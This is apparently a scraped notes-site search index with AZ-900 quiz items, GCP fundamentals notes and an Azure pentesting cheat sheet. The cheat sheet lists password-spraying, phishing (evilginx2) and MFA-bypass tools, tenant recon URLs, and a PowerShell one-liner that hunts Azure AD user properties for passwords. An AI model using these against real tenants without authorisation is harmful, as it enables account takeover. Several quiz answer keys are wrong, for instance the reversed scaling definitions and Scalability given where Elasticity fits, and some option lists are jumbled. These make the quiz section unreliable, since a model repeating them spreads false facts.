        How can you manage costs in Azure?

        You can manage costs in Azure by creating multiple subscriptions for different types of billing requirements, and Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.

        What is the purpose of resource access control in Azure?

        The purpose of resource access control in Azure is to manage and control access to the resources that users provision within each subscription.

        What is the purpose of an Azure management group? Azure management groups provide a level of scope above subscriptions for efficiently managing access, policies, and compliance for those subscriptions.

        How do management groups affect subscriptions?

        All subscriptions within a management group automatically inherit the conditions applied to the management group.

        Can all subscriptions within a single management group trust different Azure AD tenants?

        No, all subscriptions within a single management group must trust the same Azure AD tenant.

        How can management groups be used for governance?

        You can apply policies to a management group that limit the regions available for VM creation, for example, which would be applied to all management groups, subscriptions, and resources under that management group.

        How can management groups be used to provide user access to multiple subscriptions?

        By moving multiple subscriptions under that management group, you can create one role-based access control (RBAC) assignment on the management group, which will inherit that access to all the subscriptions.

        How many management groups can be supported in a single directory?

        10,000 management groups can be supported in a single directory.

        How many levels of depth can a management group tree support?

        A management group tree can support up to six levels of depth, not including the root level or the subscription level.

        Can each management group and subscription have multiple parents?

        No, each management group and subscription can support only one parent.

        Is each management group and subscription within a single hierarchy in each directory?

        Yes, all subscriptions and management groups are within a single hierarchy in each directory.

        If you want to Use this Provision Linux and Windows virtual machines in seconds with the configurations of your choice Virtual Machines Achieve high availability by autoscaling to create thousands of VMs in minutes Virtual Machine Scale Sets Get deep discounts when you provision unused compute capacity to run your workloads Azure Spot Virtual Machines Deploy and scale containers on managed Kubernetes Azure Kubernetes Service (AKS) Accelerate app development using an event-driven, serverless architecture Azure Functions Develop microservices and orchestrate containers on Windows and Linux Azure Service Fabric Quickly create cloud apps for web and mobile with fully managed platform App Service Containerize apps and easily run containers with a single command Azure Container Instances Cloud-scale job scheduling and compute management with the ability to scale to tens, hundreds, or thousands of virtual machines Batch Create highly available, scalable cloud applications and APIs that help you focus on apps instead of hardware Cloud Services Deploy your Azure virtual machines on a physical server only used by your organization Azure Dedicated Host

        What is the key difference between vertical scaling and horizontal scaling?

        • Vertical scaling adds more processing power, while horizontal scaling increases storage capacity. (Incorrect)
        • Vertical scaling adjusts the number of resources, while horizontal scaling adjusts capabilities. (Correct)

        You are an IT manager and want to ensure that you are notified when the Azure spending reaches a certain threshold. Which feature of Azure Cost Management should you use?

        • Budgets (Correct)
        • Cost alerts (Incorrect)

        Which of the following tools is NOT available within the Azure Security Center for vulnerability management?

        • Azure Defender (Incorrect)
        • Azure Policy (Incorrect)
        • Azure Advisor (Incorrect)
        • Azure Firewall Manager (Correct)

        Your company makes use of several SQL\u00a0databases. However, you want to increase their efficiency because of varying and unpredictable workloads. Which of the following can help you with this?

        • Resource Tags (Incorrect)
        • Elastic Pools (Correct)
        • Region Pairs (Incorrect)
        • Scale Sets (Incorrect)

        Just like Azure VM\u00a0Scale Sets are used with VMs, you can use\u00a0Elastic Pools\u00a0with Azure SQL\u00a0Databases!

        SQL Database elastic pools\u00a0are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.

        Which of the following alert types are available in the Cost Management service? (Select all that apply)

        • Resource usage alerts (Incorrect)
        • Budget alerts (Correct)
        • Department spending quota alerts (Correct)
        • Credit alerts (Correct)

        Azure Site Recovery can only be used to replicate and recover virtual machines within Azure.

        YES / NO

        The answer is No. Azure Site Recovery can be used to replicate and recover virtual machines not only within Azure, but also from on-premises datacenters to Azure, and between different datacenters or regions. Azure Site Recovery is a disaster recovery solution that provides continuous replication of virtual machines and physical servers to a secondary site, allowing for rapid recovery in case of a disaster. It supports a wide range of scenarios, including replication from VMware, Hyper-V, and physical servers to Azure, as well as replication between Azure regions or datacenters.

        The ability to provision and deprovision cloud resources quickly, with minimal management effort, is known as _.

        • Sustainability (Incorrect)
        • Scalability (Correct)
        • Elasticity (Incorrect)
        • Resiliency (Incorrect)

        The correct answer is Scalability. It specifically refers to the ability to provision and deprovision cloud resources quickly and with minimal management effort.

        • Resiliency:\u00a0It refers to the ability of a system to recover quickly from failures or disruptions. While resiliency is an important attribute of cloud systems, it is not specifically related to the ability to provision and deprovision resources quickly.
        • Elasticity:\u00a0It is the ability of a system to scale up or down in response to changes in demand. This is a closely related concept to scalability, but specifically refers to the ability to handle changes in workload or traffic.
        • Sustainability:\u00a0It refers to the ability of a system to operate in an environmentally friendly manner, with minimal impact on the planet. While sustainability is an important consideration for cloud providers, it is not specifically related to the ability to provision and deprovision resources quickly.

        It's possible to deploy an Azure VM\u00a0from a MacOS based system by using which of the following options?

        • Azure Powershell (Correct)
        • Azure Cloudshell (Correct)
        • Azure Portal (Correct)
        • Azure CLI (Correct)

        Which of the following can be included as artifacts in an Azure Blueprint? (Select all that apply)

        • Policy assignments (Correct)
        • Azure Resource Manager templates (Correct)
        • Role assignments (Correct)
        • Resource groups (Correct)

        Azure Service Health allows us to define the critical resources that should never be impacted due to outages and downtimes.

        YES / NO

        No. Azure Service Health notifies you about Azure service incidents and planned maintenance. Although you can see when a maintenance is planned and act accordingly to migrate a VM if needed, you can't prevent service failures.

        It's possible to deploy a new Azure VM\u00a0from a Google Chromebook by using PowerAutomate.

        YES / NO

        No. Tricky question! PowerAutomate is not the same as PowerShell.

        Which of the following services can help you:

        • Assign\u00a0time-bound\u00a0access to resources using start and end dates (Incorrect)
        • Enforce\u00a0multi-factor authentication\u00a0to activate any role (Incorrect)
        • Azure Privileged Identity Management (Correct)
        • Azure DDos Protection (Incorrect)
        • Azure Security Center (Incorrect)
        • Azure Advanced Threat Protection (ATP) (Incorrect)

        Azure Active Directory (Azure AD)\u00a0Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in your organization. These resources include resources in Azure AD, Azure, and other Microsoft Online Services like Office 365 or Microsoft Intune.

        Which of the following actions can help you reduce your Azure costs?

        • Enabling automatic scaling for all virtual machines (Incorrect)
        • Increasing the number of virtual machines deployed (Incorrect)
        • Reducing the amount of data transferred between Azure regions (Correct)
        • Keeping all virtual machines running 24/7 (Incorrect)

        Reducing the amount of data transferred between Azure regions can help reduce costs by minimizing data egress charges.

        In the defense-in-depth model, what is the role of the \"network\" layer?

        • It secures access to virtual machines. (Incorrect)
        • It ensures the physical security of computing hardware. (Incorrect)
        • It limits communication between resources and enforces access controls. (Correct)
        • It focuses on securing access to applications. (Incorrect)

        The \"network\" layer in the defense-in-depth model is responsible for limiting communication between resources, which helps prevent the spread of attacks. It enforces access controls to ensure that only necessary communication occurs and reduces the risk of an attack affecting other systems.

        You want to restrict access to certain Azure resources based on departmental requirements within your organization. Which Azure feature would you use?

        • Resource groups (Incorrect)
        • Subscriptions (Correct)
        • Azure Active Directory (Incorrect)
        • Management groups (Incorrect)

        In this scenario, you would use\u00a0subscriptions\u00a0to restrict access to certain Azure resources based on departmental requirements. Subscriptions can be used to apply different access-management policies, reflecting different organizational structures. Azure applies access-management policies at the subscription level, which allows you to manage and control access to the resources that users provision within specific subscriptions.

        Which of the following affect costs in Azure? (Choose 2)

        • Availability Zone (Incorrect)
        • Instance size (Correct)
        • Location (Correct)
        • Knowledge center usage (Incorrect)

        The instance size and the location (eg -US or Europe etc ) affect the prices. The knowledge center is completely free to use, and you aren't charged for an Availability Zone.

        Which of the following can be used to manage your Azure Resources from an iPhone?

        • Azure Portal (Correct)
        • Windows PowerShell (Incorrect)
        • Azure Cloud Shell (Correct)
        • Azure CLI (Incorrect)
        • Azure Mobile App (Correct)

        Azure CLI can be installed on MacOS but it cannot be installed on an iPhone. Windows PowerShell can be installed on MacOS but it cannot be installed on an iPhone.

        It is possible to deploy Azure resources through a Tablet by using Bash in the Azure Cloud Shell.

        No / Yes

        yes. Azure Cloud Shell is an interactive, authenticated,\u00a0browser-accessible (the key to everything since all you need is a browser and the OS\u00a0doesn't matter)\u00a0shell for managing Azure resources. It provides the flexibility of choosing the shell experience that best suits the way you work,\u00a0either Bash or PowerShell.

        Which of the following services allows you to send events generated from Azure resources to applications?

        • Azure Event Hub (Incorrect)
        • Azure Event Grid (Correct)
        • Azure Cognitive Services (Incorrect)
        • Azure App Service (Incorrect)

        What Azure service provides recommendations to optimize your cloud spending based on your usage patterns?

        • Azure Monitor (Incorrect)
        • Azure Cost Management and Billing (Correct)
        • Azure Policy (Incorrect)
        • Azure Advisor (Incorrect)

        Azure Cost Management and Billing\u00a0is the correct answer &\u00a0provides recommendations to optimize your cloud spending based on your usage patterns. The service provides insights and cost management tools to help you monitor, allocate, and optimize your cloud costs.

        Which of the following services allows you to send events generated from Azure resources to applications?

        • Azure Event Hub
        • Azure Event Grid
        • Azure Cognitive Services
        • Azure App Service
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/pentesting-azure/","title":"Pentesting Azure","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#reconnaissance","title":"Reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#network-discovery","title":"Network discovery","text":"
        • Nmap
        • Masscan
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance","title":"DNS reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance_1","title":"DNS reconnaissance","text":"
        • GitHub - aboul3la/Sublist3r: Fast subdomains enumeration tool for penetration testers
        • GitHub - rbsec/dnscan
        • nslookup, host, dig
        • GitHub - darkoperator/dnsrecon: DNS Enumeration Script
        • GitHub - lanmaster53/recon-ng: Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#certificate-transparency","title":"Certificate transparency","text":"
        • crt.sh | Certificate Search
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#miscellaneous","title":"Miscellaneous","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shodan","title":"Shodan","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#eyewitness","title":"Eyewitness","text":"

        GitHub - FortyNorthSecurity/EyeWitness: EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-discovery","title":"Azure Discovery","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#finding-tenantid","title":"Finding tenantID","text":"
        • https://enterpriseregistration.windows.net/company.com/enrollmentserver/contract?api-version=1.4
        • https://login.microsoftonline.com/getuserrealm.srf?login=username@company.com&xml=1

        • AADInternals

        • Invoke-AADIntReconAsOutsider -DomainName company.com
        • Get-AADIntTenantDomains -Domain company.com
        • Invoke-AADIntReconAsOutsider -DomainName company.com
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-ip-ranges","title":"Azure IP ranges","text":"

        Download Azure IP Ranges and Service Tags \u2013 Public Cloud from Official Microsoft Download Center

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#openid-configuration-document","title":"OpenID configuration document","text":"
        • https://login.microsoftonline.com/\\/v2.0/.well-known/openid-configuration","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#scrape-azure-resources","title":"Scrape Azure Resources","text":"

          GitHub - lutzenfried/CloudScraper: CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.

          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#google-dorks","title":"Google Dorks","text":"
          • Reveal the Cloud with Google Dorks | by Mike Takahashi | Feb, 2023 | InfoSec Write-ups (infosecwriteups.com)
          • Useful Google Dorks for Open Source Intelligence Investigations - Maltego
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-repositories-and-leaked-credentials","title":"Public repositories and leaked credentials","text":"
          • gitleaks (https://github.com/zricethezav/gitleaks)
          • trufflehog (https://github.com/trufflesecurity/truffleHog)
          • git-secrets (https://github.com/awslabs/git-secrets)
          • shhgit (https://github.com/eth0izzle/shhgit)
          • gitrob (https://github.com/michenriksen/gitrob)
          • dumpsterdiver\u00a0GitHub - securing/DumpsterDiver: Tool to search secrets in various filetypes.
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#enumeration","title":"Enumeration","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-storage-accounts-enumeration","title":"Public Storage Accounts Enumeration","text":"
          • Public Buckets (osint.sh)
          • Public Buckets by GrayhatWarfare
          • GitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
          • Microburst:\u00a0Invoke-EnumerateAzureBlobs
          • https://storagename.blob.core.windows.net/CONTAINERNAME?restype=container&comp=list\u00a0(https://docs.microsoft.com/en-us/rest/api/storageservices/list-containers2)
          • GitHub - cyberark/BlobHunter: Find exposed data in Azure with this public blob scanner
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#onedrive-enumeration","title":"OneDrive Enumeration","text":"
          • GitHub - nyxgeek/onedrive_user_enum: onedrive user enumeration - pentest tool to enumerate valid o365 users
          • https://www.trustedsec.com/blog/achieving-passive-user-enumeration-with-onedrive/
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#service-enumeration","title":"Service Enumeration","text":"
          • PS C:\\ > Invoke-EnumerateAzureSubDomains -Base \\ -Verbose
          • GitHub - 0xsha/CloudBrute: Awesome cloud enumerator
          • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#subdomain-takeover","title":"Subdomain Takeover","text":"
            • Subdomain Takeover in Azure: making a PoC | GoDiego
            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#user-enumeration","title":"User enumeration","text":"
            • GitHub - LMGsec/o365creeper: Python script that performs email address validation against Office 365 without submitting login attempts.
            • https://login.microsoftonline.com/getuserrealm.srf?login=\\&xml=1
            • GitHub - dirkjanm/ROADtools: A collection of Azure AD tools for offensive and defensive security purposes\u00a0(authenticated)
            • GitHub - nyxgeek/o365recon: retrieve information via O365 and AzureAD with a valid cred
            • GitHub - DanielChronlund/DCToolbox: Tools for Microsoft cloud fans
            • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shadow-admin-privileged-users-enumeration","title":"Shadow Admin / Privileged Users Enumeration","text":"
              • GitHub - cyberark/SkyArk: SkyArk helps to discover, assess and secure the most privileged entities in Azure and AWS
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#secrets-in-azure","title":"Secrets in Azure","text":"

              Not sure if this still works:\u00a0GitHub - FSecureLABS/Azurite: Enumeration and reconnaissance activities in the Microsoft Azure Cloud.

              Find credentials in

              • Environment variables or source code (Azure Function)
              • .publishsettings
              • Web & app config
               $users = Get-MsolUser -All; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like \"*password*\"){Write-Output (\"[*]\" + $user.UserPrincipalName + \"[\" + $prop + \"]\" + \" : \" + $user.$prop)}}}\n
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#initial-access-attack","title":"Initial Access Attack","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#password-spraying","title":"Password spraying","text":"
              • GitHub - SecurityRiskAdvisors/msspray: Password attacks and MFA validation against various endpoints in Azure and Office 365
              • GitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
              • GitHub - MarkoH17/Spray365: Spray365 makes spraying Microsoft accounts (Office 365 / Azure AD) easy through its customizable two-step password spraying approach. The built-in execution plan features options that attempt to bypass Azure Smart Lockout and insecure conditional access policies.
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#bypass-conditional-access","title":"Bypass conditional access","text":"
              • The Attackers Guide to Azure AD Conditional Access \u2013 Daniel Chronlund Cloud Security Blog
              • How to Find MFA Bypasses in Conditional Access Policies - YouTube
              • Getting started with ROADrecon \u00b7 dirkjanm/ROADtools Wiki \u00b7 GitHub
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#instance-metadata-service","title":"Instance Metadata Service","text":"
              • Steal Secrets with Azure Instance Metadata Service? Don\u2019t Oversight Role-based Access Control | by Marcus Tee | Marcus Tee Anytime | Medium
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#phishing","title":"Phishing","text":"
              • Illicit Consent Grant Attack
              • Abusing Device Code Flow: - OAuth\u2019s Device Code Flow Abused in Phishing Attacks | Secureworks
              • Evilginx2: - GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#lateral-movement","title":"Lateral movement","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#privilege-escalation","title":"Privilege escalation","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#persistence","title":"Persistence","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/containers/pentesting-docker/","title":"Pentesting docker","text":"

              https://www.panoptica.app/research/7-ways-to-escape-a-container

              ","tags":["cloud","docker","containers"]},{"location":"cloud/gcp/gcp-essentials/","title":"Google Cloud Platform (GCP) Essentials","text":"Sources of this notes
              • Udemy course: Google Cloud Platform (GCP) Fundamentals for Beginners

              Cheatsheets: gcloud CLI

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#basic-numbers","title":"Basic numbers","text":"
              • 20 regions
              • 61 zones
              • 134 network edge locations
              • 200+ countries and territories.

              A Region typically has two Zones. A zone is the equivalent of a data center in Google Cloud.

              Overview of services:

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#signing-up-with-gcp","title":"Signing-up with GCP","text":"

              $300 in free credits to run more than 25 service for free. are provided with 90

              Link: https://cloud.google.com/gcp/

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#gcp-resources","title":"GCP resources","text":"

              In Google Cloud Platform, everything that you create is a resource. There is a hierarchy:

              • Everything that you create is a resource.
              • Resources belong to a project.
              • A project directly represents a billable unit. It has a credit card associated.
              • Projects may be organized into folders (like dev or production), which provide logical grouping of projects.
              • Folders belong to one and only one organization.
              • The organization is the top level entity in GCP hierarchy.

              If you use Google Suite, you will see the organization level and folders. If you don't, you will only have access to projects and resources.

              To interact with GCP there are these tools: web console, cloud shell cloud SDK, mobile App, Rest API.

              GCP Cloud Shell is an interactive shell environment for GCP, accessible from any web browser, with a preloaded IDE named gcloud, which is the command line utility, and based on a GCE Virtual Machine (provisioned with 5GB persistent disk storage and Debian environment). It has a built-in preview functionality withou dealing with tunneling and other issues.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#2-compute-services","title":"2. Compute Services","text":"

              Code is deployed and executed in one of the compute services:

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#21-app-engine","title":"2.1. App Engine","text":"

              It's one of the first compute services from Google (PaaS) in 2008. It's a fully managed platform for deploying web apps at scale. It supports multiple languages. It's available in two environments:

              • Standard: Applications run in a sandbox.
              • Flexible: You have more control on packages and environments. Applications run on docker containers, which are in use to deploy but also to scale apps.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#22-compute-engine-gce","title":"2.2. Compute Engine (GCE)","text":"

              Google Compute Engine (GCE) enables Linux and Windows VMs to run on Google's global infraestructure. VMs are based on machine types with varied CPU and RAM configuration.

              If you need that VMs are persistent, you need to attach additional storage such standards and SSD disks. Otherwise, when closing the VM you will loose all configurations and setups.

              VMs are charged a minimum of 1 minute and in 1 second increments after that. Sustained use discounts are offered for running VMs for a significant portion of the billing month. Committed use discounts are offered for purchases based on1 year or 3 year contracts.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#23-kubernetes-engine","title":"2.3. Kubernetes Engine","text":"
              • GKE is a managed environment for deploying containerized applications managed by Kubernetes. Kubernetes was originated on Google but now is open source project part of Cloud-Native Computing Foundation.
              • Kubernetes has a control plane and worker node (or multiple).
              • GKE provisions worker nodes as GCE VMs. Google manages the control plane (and the master nodes) and that is why is called a managed environment.
              • Node pools enable mixing and matching different VM configurations.
              • The service is tightly integrated with GCP resources such as networking, storage, and monitoring.
              • GKE infrastructure is monitored by Stack Driver, which is the built-in monitoring and tracing platform.
              • Auto scaling, automatic upgrades, and node auto-repair are some of the unique features of GKE.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#24-cloud-functions","title":"2.4. Cloud Functions","text":"
              • Cloud Functions is a serverless execution environment connecting cloud services for building and connecting cloud services.
              • Serverless compute environments execute code in response to an event.
              • Cloud Functions supports JavaScript, Python, and Go.
              • GCP events fire a Cloud Function through a trigger.
              • An example event includes adding an object to a storage bucket.
              • Trigger connects the event to the function.
              • This is FaaS, Function as a Service.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#3-storage-services","title":"3. Storage Services","text":"
              • Storage services add persistence and durability to applications
              • Storage services are classified into three types:

                • Object storage
                • Block storage
                • File system
              • GCP storage services can be used to store:

              • Unstructured data
              • Folders and Files
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#31-google-cloud-storage","title":"3.1. Google Cloud Storage","text":"
              • Unified object storage for a variety of applications.
              • Applications can store and retrieve objects (typically through single API).
              • GCS can scale to exabytes of data.
              • GCS is designed for 99.999999999% durability.
              • GCS can be used to store high-frequency and low-frequency access of data.
              • Data can be stored within a single region, dual-region, or multi-region.
              • There are three default storage class for the data: Standard, Nearline, and Coldline.
              • Launching GCS. When creating a Storage entity in GCP, we will create buckets, which are containers for folders and storage objects. Folders may contain Files. Therefore, Buckets are the highest level container in the GCS hierarchy. As for encryption, you can decided if it is Google-managed key or Customer-managed key. Additionally, retention policy can be added when creating a storage entity. You also have labels. After that you can create folders and allocate files in them.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#32-persistent-disks","title":"3.2. Persistent Disks","text":"
              • PD provides reliable block storage for GCE VMs.
              • Disks are independent of Compute Engine VMs, which means they can have a different lifecycle.
              • Each disk can be up to 64TB in size.
              • PDs can have one writer and multiple readers. This is quite unique in GCP. Basically, if you have a scenario where you need to attach the disk to one VM for read-write access but read that data from multiple VMs in a read-only mode, you can do that with persistent disks. So one VM will act as the writer and all other VMs will act as readers. So this gives you the ability to designate one VM for read-write, while adding multiple VMs that are quickly reading from the same disk with a read-only access. This opens up lot of opportunities where you need to create distributed applications with centralized data access.
              • Supports both SSD and HDD storage options.
              • SSD offers best throughput for I/O intensive applications.
              • PD is available in three storage types:
                • Zonal.
                • Regional.
                • Local.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#33-google-cloud-filestore","title":"3.3. Google Cloud Filestore","text":"
              • Managed file storage service traditionally for legacy applications.
              • Delivers NAS-like filesystem interface and a shared filesystem.
              • Centralized, highly-available filesystem for GCE and GKE.
              • Exposed as a NFS fileshare with fixed export settings and default Unix permissions.
              • Filestore file shares are available as mount points in GCE VMs.
              • On-prem applications using NAS take advantage of Filestore.
              • Filestore has built-in zonal storage redundancy for data availability.
              • Data is always encrypted while in transit.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#4-network-services","title":"4. Network Services","text":"
              • Network services are one of the key building blocks of cloud.
              • GCP leverages Google\u2019s global network for connectivity.
              • Customers can choose between standard and premium tiers. Standard allows you to use the normal backbone of GCP network and Premium gives you access to the premium backbone. Therefore, Standard tier leverages selection of ISP-based internet backbone for connectivity (which is cheaper). GCP uses premium tier as the default option.
              • Load balancers route the traffic evenly to multiple endpoints.
              • Virtual Private Cloud (VPC) offers private and hybrid networking.
              • Customers can extend their data center to GCP through hybrid connectivity.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#41-load-balancers","title":"4.1. Load Balancers","text":"
              • Load balancer distributes traffic across multiple GCE VMs in a single or multiple regions.
              • There are two types of GCP load balancers:
                • HTTP(S) load balancer, which provides global load balancing.
                • Network load balancer, which balances regional TCP and UDP traffic within the same region. \u2022 Both types can be configured as internal or external load balancers
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#configure-is-a-couple-of-vms-deployed-in-a-region-connected-to-a-load-balancer","title":"Configure is a couple of VMs deployed in a region connected to a load balancer","text":"
              • From GCP web dashboard, go to Compute Engine, then Instance Templates.
              • Select machine type, disk image, and allow HTTP and HTTPs in firewall configuration since we are launching a web server. Configure automation to get the server running from booting. Add the following script:
              # Add the below script while creating the instance template \n\n#! /bin/bash \napt-get update \napt-get install -y apache2 \ncat <<EOF > /var/www/html/index.html \n<html><body><h1>Hello from $(hostname)</h1> \n</body></html> \nEOF \n
              • Create the template.
              • Now go to Instance group for setting up the deployment. Configure multiple zones, select the instance template (the one you created before) and the number of instances to deploy. Create a Health Check. Launch the instance group and in a few minutes you will have the 2 web servers (Go to VM instances to see them).
              • Go to Network section, then Load balancing and click on create load balancer, and follow the creation tunnel.
              • The first step is creating a backend configuration. So the backend configuration will ensure that we have a set of resources responsible for serving the traffic. Options to configure there:

                • Network endpoint groups // Or // Instance groups : choose the backend type as the instance group and choose the web server instance group we have launched in the previous step. Port is 80. That is the default port on which Apache is listening.
                • Balancing mode: traffic can be routed based on CP utilization or the request per second. If you are not going to send a lot of traffic, choose rate.
                • The maximum RPS, 100.
                • Associate this backend with the health check created earlier. This health check will be a checkpoint for the load balancer to decide whether to route the traffic to the instance or not. If the health check fails for one of the instances load balancer will gracefully send a request to the other instance and this will enhance the user experience where they only see only see the output coming from healthy instances.
              • The second step is setting up host and path rules, there are not multiple endpoints, leave that as the default.

              • Third step, Front end configuration. The front end is basically how the consumer or the client of your application sees the endpoint. Configure it:
                • Provide a name.
                • Protocol is HTTP.
                • Premium, this is the network service there.
                • IPv4, it's an ephemeral IP address.
              • Fourth step, review settings.

              In about five minutes, the load balancer will be completely functioning, which means it will be able to route the traffic to one of the instances in the backend group, which is based on the instance template that we created. By accessing to the load balancer IP:80 you will be redirected each time to a different machine.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#42-virtual-private-cloud-vpc","title":"4.2. Virtual Private Cloud (VPC)","text":"
              • VPC is a software defined network providing private networking for VMs.
              • VPC network is a global resource with regional subnets.
              • Each VPC is logically isolated from each other.
              • Firewall rules allow or restrict traffic within subnets. Default option is deny.
              • Resources within a VPC communicate via IPV4 addresses and there is a DNS service within VPC that provides name resolution.
              • VPC networks can be connected to other VPC networks through VPC peering.
              • VPC networks are securely connected in hybrid environments using Cloud VPN or Cloud Interconnect.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#43-hybrid-connectivity","title":"4.3. Hybrid Connectivity","text":"
              • Hybrid connectivity extends local data center to GCP.
              • Three GCP services enable hybrid connectivity:
                • Cloud Interconnect: Cloud Interconnect extends on-premises network to GCP via Dedicated or Partner Interconnect.
                • Cloud VPN: Cloud VPN connects on-premises environment to GCP securely over the internet through IPSec VPN.
                • Peering: Peering enables direct access to Google Cloud resources with reduced Internet egress fee
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#5-identity-access-management","title":"5. Identity & Access Management","text":"
              • IAM controls access by defining who (identity) has what access (role) for which resource. Members (who), roles (what) , and permissions (which).
              • Cloud IAM is based on the principle of least privilege.
              • An IAM policy binds identity to roles which contains permissions.

              Where do you use IAM?

              \u2022 To share GCP resources with fine-grained control. \u2022 Selectively allow/deny permissions to individual resources. \u2022 Define custom roles that are specific to a team/organization. \u2022 Enable authentication of applications through service accounts.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#51-cloud-iam-identity","title":"5.1. Cloud IAM Identity","text":"

              A Google account is a Cloud IAM user so anyone with a gmail account or a google account will become visible as a cloud IAM user.

              A Service account is a special type of user. It's meant for applications to talk to GCP resources.

              A Google group is also a valid user or a member in Cloud IAM because it represents a logical entity that is a collection of users.

              A G Suite domain like yourorganization.com is also a valid user or a member. You can assign permissions to an entire G Suite domain.

              If you are not part of google, you can use Cloud Identity Service to create a Cloud identity domain, that is also a valid Cloud IAM user.

              And \"allAuthenticatedUsers\" is also an entity that allows you to assign permissions to all users authenticated through Google's authentication system.

              Last, \"allUsers\" assigns permissions even to anonymous users.

